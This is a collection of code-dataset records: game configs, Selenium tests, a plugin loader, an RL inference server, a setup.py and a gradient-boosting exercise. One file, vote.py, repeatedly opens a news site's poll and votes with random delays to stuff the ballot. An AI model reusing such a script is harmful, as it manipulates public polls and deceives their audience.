"os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 60, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 66, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 66, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 66, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 76, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 103, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 104, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 115, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 116, "usage_type": "call"}]} {"seq_id": "382821044", "text": "# snake parameters\r\nfrom pygame import K_p\r\n\r\nSNAKE_COLOR = (255,0,0)\r\nSNAKE_POS0 = (10,10)\r\n\r\nSNACK_COLOR = (0,255,0)\r\nSNAKETAIL_COLOR = (0,0,255)\r\n# to change the snake speed\r\nSNAKE_DT = 0.15# sleep in seconds\r\n# snake eyes color\r\nEYE_COLOR = (0,0,0)\r\n\r\n# grid numbers\r\nNROWS = 20\r\nNCOLS = 20\r\n# grid size\r\nGRID_DX = 25\r\nGRID_DY = 25\r\n# grid color\r\nGRID_COLOR = (255,255,255)\r\n\r\n# display\r\nDISPLAY_WIDTH = GRID_DX*NROWS\r\nDISPLAY_HEIGHT = GRID_DY*NCOLS\r\n# display background\r\nBACKGROUND_COLOR = (0,0,0)\r\n\r\n\r\n# pause key\r\nPAUSE_KEY = K_p", "sub_path": "snake_pygame/CONFIGS.py", "file_name": "CONFIGS.py", "file_ext": "py", "file_size_in_byte": 537, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.K_p", "line_number": 31, "usage_type": "name"}]} {"seq_id": "52090515", "text": "\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom Utilites.BaseClass import BaseClass\n\n\nclass testone(BaseClass):\n\n def test_End2End(self):\n products = self.driver.find_elements_by_css_selector(\"div[class='card h-100']\")\n for product in products:\n Productname = product.find_element_by_xpath(\"div/h4/a\").text\n if Productname == \"Blackberry\":\n product.find_element_by_xpath(\"div/button\").click()\n\n self.driver.find_element_by_class_name(\"btn-primary\").click()\n self.driver.find_element_by_class_name(\"btn-success\").click()\n\n self.driver.find_element_by_id(\"country\").send_keys('ind')\n\n wait = WebDriverWait(self.driver, 7)\n wait.until(EC.presence_of_element_located((By.LINK_TEXT, \"India\")))\n self.driver.find_element_by_link_text(\"India\").click()\n\n self.driver.find_element_by_xpath(\"//div[@class='checkbox checkbox-primary']\").click()\n self.driver.find_element_by_css_selector(\"input[type='submit']\").click()\n\n textmessage = self.driver.find_element_by_css_selector(\".alert-success\").text\n\n assert \"Success!\" in textmessage\n\n self.driver.get_screenshot_as_file(\"abhishek.png\")\n", "sub_path": "pythonProject/Frameworkdev/Tests/test_End2End.py", "file_name": "test_End2End.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "Utilites.BaseClass.BaseClass", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 25, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}]} {"seq_id": "74027879", "text": "from os.path import join, dirname, abspath\nfrom os import listdir\nimport importlib.util\n\nimport logging\n\nfrom uuid import uuid4\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass PluginManager(object):\n _plugins = {}\n _instance = None\n\n def __new__(clazz):\n if clazz._instance is None:\n clazz._instance = super(PluginManager, clazz).__new__(clazz)\n return clazz._instance\n\n def get_plugins(self):\n return self._plugins\n\n def get_user_plugins_dir(self):\n script_path = abspath(__file__)\n script_dir = dirname(script_path)\n return join(script_dir, \"user_plugins\")\n\n def load_plugins(self):\n logging.info(f\"Loading plugins...\")\n plugins_dir = self.get_user_plugins_dir()\n for file in listdir(plugins_dir):\n if file == \"__pycache__\":\n continue\n plugin_path = join(plugins_dir, file)\n module_name = f\"{file}\"\n logging.info(f\"\\tloading plugin {module_name} ({plugin_path})...\")\n spec = importlib.util.spec_from_file_location(\n f\"plugin_{module_name}\", plugin_path\n )\n plugin_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(plugin_module)\n plugin_uuid = uuid4()\n self._plugins[plugin_uuid] = plugin_module.Plugin(\n runtime_id=plugin_uuid, name=module_name\n )\n", "sub_path": "ingest/plugin_manager.py", "file_name": "plugin_manager.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 30, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 37, "usage_type": "call"}, {"api_name": "importlib.util.util.spec_from_file_location", "line_number": 38, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 38, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 38, "usage_type": "name"}, {"api_name": "importlib.util.util.module_from_spec", "line_number": 41, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 41, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 41, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 43, "usage_type": "call"}]} {"seq_id": "628674812", "text": "#-*- coding: utf-8 -*-\nfrom proteus import Model\nimport utils\nimport calles\n\ndef crear_inmueble(party):\n \"\"\"\n Crea un sigcoop_inmueble.inmueble asociado a party.\n\n Módulos que modifican inmueble:\n sigcoop_inmueble/inmueble.py\n\n Campos:\n calle_dom = fields.Char('Calle', required=True)\n numero_dom = fields.Char('Numero', required=True)\n cp_dom = fields.Char('CP', required=True)\n localidad_dom = fields.Char('Localidad', required=True)\n partido_dom = fields.Char('Partido', required=True)\n titulares = fields.Many2Many('sigcoop_inmueble.inmueble_titular','inmueble_id', 'titular_id', 'Titulares del inmueble')\n \"\"\"\n Inmueble = Model.get('sigcoop_inmueble.inmueble')\n inmueble = Inmueble()\n inmueble.calle_dom = utils.random_from_list(calles.calles)\n inmueble.numero_dom = 'nro'\n inmueble.cp_dom = 'cp'\n inmueble.localidad_dom = 'localidad'\n inmueble.partido_dom = 'partido'\n inmueble.titulares.append(party)\n inmueble.save()\n return inmueble\n", "sub_path": "scripts/inmueble.py", "file_name": "inmueble.py", "file_ext": "py", "file_size_in_byte": 1014, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "proteus.Model.get", "line_number": 21, "usage_type": "call"}, {"api_name": "proteus.Model", "line_number": 21, "usage_type": "name"}, {"api_name": "utils.random_from_list", "line_number": 23, "usage_type": "call"}, {"api_name": "calles.calles", "line_number": 23, "usage_type": "attribute"}]} {"seq_id": "126356014", "text": "import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ndef acci_type(acci,data):\n top=31\n my_acci=acci\n\n data.loc[len(data)] = [my_acci,'None']\n\n count_vector = CountVectorizer(ngram_range=(1,3))\n c_vector_title = count_vector.fit_transform(data['input'])\n\n title_c_sim = cosine_similarity(c_vector_title, c_vector_title).argsort()[:,::-1]\n\n target_type_index = data[data['input'] == my_acci].index.values\n\n sim_index = title_c_sim[target_type_index, :top].reshape(-1)\n sim_index = sim_index[sim_index != target_type_index]\n result = data.iloc[sim_index]\n best_type = result['output'].value_counts().head(3)\n \n top_3={}\n l=1\n for i in best_type.index:\n top_3[l]=i\n l+=1\n \n return top_3\n", "sub_path": "acci_type/type.py", "file_name": "type.py", "file_ext": "py", "file_size_in_byte": 916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 14, "usage_type": "call"}]} {"seq_id": "378777470", "text": "# coding: utf-8\n\nimport sys\nsys.path.append(\"/opt/tiger/test_ppo\")\n\nimport tensorflow as tf\nimport os\nimport logging\nfrom collections import OrderedDict\nimport glob\nimport argparse\nfrom multiprocessing import Queue, Process\nimport zmq\n\nfrom utils import unpack\n\nfrom zSAC.Worker_SAC import Worker_Q\nfrom zSAC.Trainer_SAC import Model\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\n\ndef clean(episodic, lifelong, data_dir, postfix):\n if lifelong is not None:\n if episodic >= lifelong:\n episodic -= lifelong\n sEPID = str(episodic)\n sEPID = (8 - len(sEPID)) * \"0\" + sEPID\n pattern = os.path.join(data_dir, sEPID + \"_*.\" + postfix)\n names = glob.glob(pattern)\n for name in names:\n if os.path.exists(name):\n try:\n os.remove(name)\n except FileNotFoundError:\n pass\n\n\ndef run(**kwargs):\n tmplimit = 512\n lifelong = None\n\n server_id = kwargs.get(\"server_id\", 0)\n\n address = \"ipc:///tmp/databack%d\" % server_id\n\n SCRIPT_DIR = kwargs.get(\"SCRIPT_DIR\")\n BASE_DIR = kwargs.get(\"BASE_DIR\")\n CKPT_DIR = kwargs.get(\"CKPT_DIR\")\n DATA_DIR = kwargs.get(\"DATA_DIR\")\n\n logging.basicConfig(\n filename=os.path.join(\n BASE_DIR, \"Serverlog\"),\n level=\"INFO\")\n\n frames = kwargs.get(\"frames\", 1)\n workers = kwargs.get(\"workers\", 16)\n parallel = kwargs.get(\"worker_parallel\", 4)\n MAX_STEPS = kwargs.get(\"max_steps\", 3200)\n seqlen = kwargs.get(\"seqlen\", 32)\n burn_in = kwargs.get(\"burn_in\", 32)\n alpha = kwargs.get(\"alpha\", 1.0)\n\n games = [\"SuperMarioBros-%d-%d-v0\" % (i, j) for i in range(1, 9) for j in range(1, 5)]\n\n config = tf.ConfigProto(\n allow_soft_placement=True,\n gpu_options=tf.GPUOptions(\n per_process_gpu_memory_fraction=0.025))\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n\n phs = dict()\n\n phs[\"s\"] = tf.placeholder(dtype=tf.float32, shape=[None, None, 84, 84, frames])\n phs[\"prev_a\"] = tf.placeholder(dtype=tf.int32, shape=[None, None])\n phs[\"state_in\"] = tf.placeholder(dtype=tf.float32, shape=[None, 128 * 4 * 2])\n phs[\"slots\"] = tf.placeholder(dtype=tf.float32, shape=[None, None])\n\n with tf.device(\"/gpu\"):\n with tf.variable_scope(\"p_lstm\", reuse=tf.AUTO_REUSE):\n plstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"q_lstm\", reuse=tf.AUTO_REUSE):\n qlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_lstm\", reuse=tf.AUTO_REUSE):\n vlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_tar_lstm\", reuse=tf.AUTO_REUSE):\n vtarlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n model = Model(7, plstm, qlstm, vlstm, vtarlstm, \"agent\", **phs)\n\n saver = tf.train.Saver(max_to_keep=None, keep_checkpoint_every_n_hours=6)\n\n # while True:\n # ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n # if ckpt is not None:\n # ckpt_path = ckpt.model_checkpoint_path\n # if ckpt_path is not None:\n # break\n # sleep_time = 10\n # logging.warning(\"No Model, Sleep %d seconds\" % sleep_time)\n # time.sleep(sleep_time)\n # saver.restore(sess, ckpt_path)\n\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n ckpt_path = None\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n sess.run(tf.global_variables_initializer())\n\n context = zmq.Context()\n frontend = context.socket(zmq.ROUTER)\n frontend.bind(address)\n\n queue_ins = OrderedDict()\n # queue_out = Queue(maxsize=3 * tmplimit)\n for i in range(workers):\n queue_in = Queue()\n worker_id = i\n queue_ins[worker_id] = queue_in\n\n worker = Process(\n target=Worker_Q,\n args=(queue_in,\n address,\n parallel,\n BASE_DIR,\n DATA_DIR,\n 3 * tmplimit,\n server_id,\n worker_id,\n \"\\t\".join(games),\n frames,\n seqlen,\n burn_in))\n worker.daemon = True\n worker.start()\n\n while True:\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n if ckpt is not None:\n new_ckpt_path = ckpt.model_checkpoint_path\n if new_ckpt_path != ckpt_path:\n ckpt_path = new_ckpt_path\n saver.restore(sess, ckpt_path)\n\n fd = {model.s_t: [],\n model.previous_actions: [],\n model.state_in: []}\n\n idx, msg = frontend.recv_multipart(copy=False)\n worker_id, databack = unpack(msg)\n s, a, state_in = databack\n fd[model.s_t] = s\n fd[model.previous_actions] = a\n fd[model.state_in] = state_in\n\n _a_t_new, _state_out_batch = sess.run(\n [model.get_current_act(),\n model.state_out],\n feed_dict=fd)\n\n dataforward = (_a_t_new,\n _state_out_batch)\n queue_ins[worker_id].put(dataforward)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-SCRIPT_DIR\", type=str,\n default=\"/opt/tiger/test_ppo\")\n parser.add_argument(\"-BASE_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2\")\n parser.add_argument(\"-CKPT_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2/ckpt\")\n parser.add_argument(\"-DATA_DIR\", type=str,\n default=\"/mnt/mytmpfs\")\n parser.add_argument(\"-server_id\", type=int, default=0)\n parser.add_argument(\"-frames\", type=int, default=1)\n parser.add_argument(\"-workers\", type=int, default=4)\n parser.add_argument(\"-worker_parallel\", type=int, default=4)\n parser.add_argument(\"-max_steps\", type=int, default=3200)\n parser.add_argument(\"-seqlen\", type=int, default=32)\n parser.add_argument(\"-burn_in\", type=int, default=32)\n parser.add_argument(\"-alpha\", type=float, default=0.001)\n args = parser.parse_args()\n run(**args.__dict__)\n pass\n", "sub_path": "zSAC/Server_SAC.py", "file_name": "Server_SAC.py", "file_ext": "py", "file_size_in_byte": 6759, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.GPUOptions", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.device", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 93, "usage_type": "attribute"}, {"api_name": "zSAC.Trainer_SAC.Model", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.train.get_checkpoint_state", "line_number": 110, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 115, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 117, "usage_type": "call"}, {"api_name": "zmq.ROUTER", "line_number": 118, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 121, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 124, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 128, "usage_type": "call"}, {"api_name": "zSAC.Worker_SAC.Worker_Q", "line_number": 129, "usage_type": "name"}, {"api_name": "tensorflow.train.get_checkpoint_state", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.unpack", "line_number": 158, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 175, "usage_type": "call"}]} {"seq_id": "221024996", "text": "from selenium import webdriver\nimport time\nimport random\n\ntarget_url = 'http://news.hankyung.com/poll/10504'\n#target_url = 'http://news.hankyung.com/poll/10504'\n\ndef vote():\n browser = webdriver.Chrome(r'C:\\chromedriver\\chromedriver.exe')\n browser.get(target_url)\n time.sleep(1)\n input = browser.find_element_by_id('qu01')\n input.click()\n time.sleep(1)\n button = browser.find_element_by_class_name('vote-btn')\n button.click()\n time.sleep(1)\n browser.quit()\n\nif __name__ == '__main__':\n for i in range(10):\n vote()\n time.sleep(random.randrange(1, 10))", "sub_path": "crawler/vote.py", "file_name": "vote.py", "file_ext": "py", "file_size_in_byte": 597, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 14, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 23, "usage_type": "call"}]} {"seq_id": "536336000", "text": "#!/usr/bin/env python3\nimport os\nfrom setuptools import setup, find_packages\nfrom jsonrpc import version\n\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return \"\"\n\nsetup(\n name=\"json-rpc-3\",\n version=version,\n packages=find_packages(),\n test_suite=\"nose.collector\",\n tests_require=[\"nose\", \"mock\"],\n author='see AUTHORS',\n maintainer='Orhideous',\n maintainer_email='orhideous@gmail.com',\n url=\"https://github.com/Orhideous/json-rpc\",\n description=\"Pure Python 3 JSON-RPC 2.0 transport realisation\",\n long_description=read('README.rst'),\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.2\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords=[\"json\", \"rpc\", \"json-rpc\", \"transport\"],\n license=\"MIT\",\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 13, "usage_type": "call"}, {"api_name": "jsonrpc.version", "line_number": 15, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 16, "usage_type": "call"}]} {"seq_id": "435097387", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 27 19:26:42 2016\n\n@author: Tzyy Shyang\n\"\"\"\n\nimport pprint as pp\n\nimport pandas as pd\nimport numpy as np\n\nimport sklearn as sk\nimport sklearn.ensemble as sken\n\nimport coursera.ml_common.commonlib as cmn\n\n\"\"\"\nExploring Ensemble Methods\n==========================\n\nIn this homework we will explore the use of boosting. For this assignment, we will use the pre-implemented gradient boosted trees. You will:\n\n- Train a boosted ensemble of decision-trees (gradient boosted trees) on the lending club dataset.\n- Predict whether a loan will default along with prediction probabilities (on a validation set).\n- Evaluate the trained model and compare it with a baseline.\n- Find the most positive and negative loans using the learned model.\n- Explore how the number of trees influences classification performance.\n\n\"\"\"\n\n# Load the Lending Club dataset\n# =============================\n\n# We will be using a dataset from the LendingClub.\n\n# 1. Load the dataset into a data frame named loans.\nloans = pd.read_csv('../../data/lending-club-data.csv', index_col='id', dtype={'desc': object}, parse_dates=[47])\n\n# Exploring some features\n\n# 2. Let's quickly explore what the dataset looks like. First, print out the column names to see what features we have in this dataset. \n# Here, we should see that we have some feature columns that have to do with grade of the loan, annual income, home ownership status, etc.\nloans.columns.values\n\n# Modifying the target column\n# ===========================\n\n# The target column (label column) of the dataset that we are interested in is called bad_loans. In this column 1 means a risky (bad) loan 0 means a safe loan.\n\n# In order to make this more intuitive and consistent with the lectures, we reassign the target to be:\n\n# +1 as a safe loan\n# -1 as a risky (bad) loan\n\n# 3. We put this in a new column called safe_loans.\n# safe_loans = 1 => safe\n# safe_loans = -1 => risky\nloans['safe_loans'] = loans['bad_loans'].apply(lambda x: +1 if x==0 else -1)\nloans = loans.drop('bad_loans', 1)\n\n# Selecting features\n# ==================\n\n# In this assignment, we will be using a subset of features (categorical and numeric). The features we will be using are described in the code comments below. \n# If you are a finance geek, the LendingClub website (https://www.lendingclub.com/) has a lot more details about these features.\n\n# 4. The features we will be using are described in the code comments below. Extract these feature columns and target column from the dataset. \n# We will only use these features.\ntarget = 'safe_loans'\nfeatures = ['grade', # grade of the loan (categorical)\n 'sub_grade_num', # sub-grade of the loan as a number from 0 to 1\n 'short_emp', # one year or less of employment\n 'emp_length_num', # number of years of employment\n 'home_ownership', # home_ownership status: own, mortgage or rent\n 'dti', # debt to income ratio\n 'purpose', # the purpose of the loan\n 'payment_inc_ratio', # ratio of the monthly payment to income\n 'delinq_2yrs', # number of delinquincies\n 'delinq_2yrs_zero', # no delinquincies in last 2 years\n 'inq_last_6mths', # number of creditor inquiries in last 6 months\n 'last_delinq_none', # has borrower had a delinquincy\n 'last_major_derog_none', # has borrower had 90 day or worse rating\n 'open_acc', # number of open credit accounts\n 'pub_rec', # number of derogatory public records\n 'pub_rec_zero', # no derogatory public records\n 'revol_util', # percent of available credit being used\n 'total_rec_late_fee', # total late fees received to day\n 'int_rate', # interest rate of the loan\n 'total_rec_int', # interest received to date\n 'annual_inc', # annual income of borrower\n 'funded_amnt', # amount committed to the loan\n 'funded_amnt_inv', # amount committed by investors for the loan\n 'installment', # monthly payment owed by the borrower\n ]\n\n# Skipping observations with missing values\n# =========================================\n\n# Recall from the lectures that one common approach to coping with missing values is to skip observations that contain missing values.\n# In Pandas, we'd run\nloans = loans[[target] + features].dropna()\n\n# Your tool may provide a function to skip observations with missing values. Consult appropriate manuals.\n\n# Fortunately, as you should find, there are not too many missing values. We are retaining most of the data.\n\n# Then follow the following steps:\n\n# - Apply one-hot encoding to loans. Your tool may have a function for one-hot encoding. Alternatively, see #7 for implementation hints.\n# - Load the JSON files into the lists train_idx and validation_idx.\n# - Perform train/validation split using train_idx and validation_idx. In Pandas, for instance:\n\ncommonlib = cmn.MachineLearningCommonLib()\nencoded_loans = commonlib.one_hot_encoding(loans)\n\ntrain_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-train-idx.json')[0].values.tolist()\nvalidation_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-validation-idx.json')[0].values.tolist()\n\ntrain_data = encoded_loans.iloc[train_idx]\ntrain_target = train_data[target]\ntrain_data = train_data.drop(target, 1)\n\nvalidation_data = encoded_loans.iloc[validation_idx]\n\n# Gradient boosted tree classifier\n# ================================\n\n# Gradient boosted trees are a powerful variant of boosting methods; they have been used to win many Kaggle competitions, and have been widely used in industry. \n# We will explore the predictive power of multiple decision trees as opposed to a single decision tree.\n\n# Additional reading: If you are interested in gradient boosted trees, here is some additional reading material:\n\n# - GraphLab Create user guide (https://turi.com/learn/userguide/supervised-learning/boosted_trees_classifier.html)\n# - Advanced material on boosted trees (http://homes.cs.washington.edu/~tqchen/pdf/BoostedTree.pdf)\n\n# We will now train models to predict safe_loans using the features above. In this section, we will experiment with training an ensemble of 5 trees.\n\n# 9. Now, let's use the built-in scikit learn gradient boosting classifier (sklearn.ensemble.GradientBoostingClassifier) to create a gradient boosted \n# classifier on the training data. You will need to import sklearn, sklearn.ensemble, and numpy.\n\n# You will have to first convert the SFrame into a numpy data matrix. See the API for more information. You will also have to extract the label column. \n# Make sure to set max_depth=6 and n_estimators=5.\ngradient_boosting_classifier = sken.GradientBoostingClassifier(max_depth=6, n_estimators=5) \ngradient_boosting_classifier.fit(train_data, train_target)\n\n# Making predictions\n# ==================\n\n# Just like we did in previous sections, let us consider a few positive and negative examples from the validation set. We will do the following:\n\n# - Predict whether or not a loan is likely to default.\n# - Predict the probability with which the loan is likely to default.\n\n# 10. First, let's grab 2 positive examples and 2 negative examples. \n\nvalidation_safe_loans = validation_data[validation_data[target] == 1]\nvalidation_risky_loans = validation_data[validation_data[target] == -1]\n\nsample_validation_data_risky = validation_risky_loans[0:2]\nsample_validation_data_safe = validation_safe_loans[0:2]\n\nsample_validation_data = sample_validation_data_safe.append(sample_validation_data_risky)\nsample_validation_data = sample_validation_data.drop(target,1)\n\n# 11. For each row in the sample_validation_data, write code to make model_5 predict whether or not the loan is classified as a safe loan. \n# (Hint: if you are using scikit-learn, you can use the .predict() method)\n\nmodel_5 = gradient_boosting_classifier.predict(sample_validation_data)\n\n# Quiz question: What percentage of the predictions on sample_validation_data did model_5 get correct?\n# ans = 75%\n\n# Prediction Probabilities\n# ========================\n\n# 12. For each row in the sample_validation_data, what is the probability (according model_5) of a loan being classified as safe? \n# (Hint: if you are using scikit-learn, you can use the .predict_proba() method)\nmodel_5_prob = gradient_boosting_classifier.predict_proba(sample_validation_data)[:,1]\n\n# Quiz Question: Which loan has the highest probability of being classified as a safe loan?\n# ans = loan 4\n\n# Checkpoint: Can you verify that for all the predictions with probability >= 0.5, the model predicted the label +1?\n\n# Evaluating the model on the validation data\n# ===========================================\n\n# Recall that the accuracy is defined as follows:\n\n# 13. Evaluate the accuracy of the model_5 on the validation_data. (Hint: if you are using scikit-learn, you can use the .score() 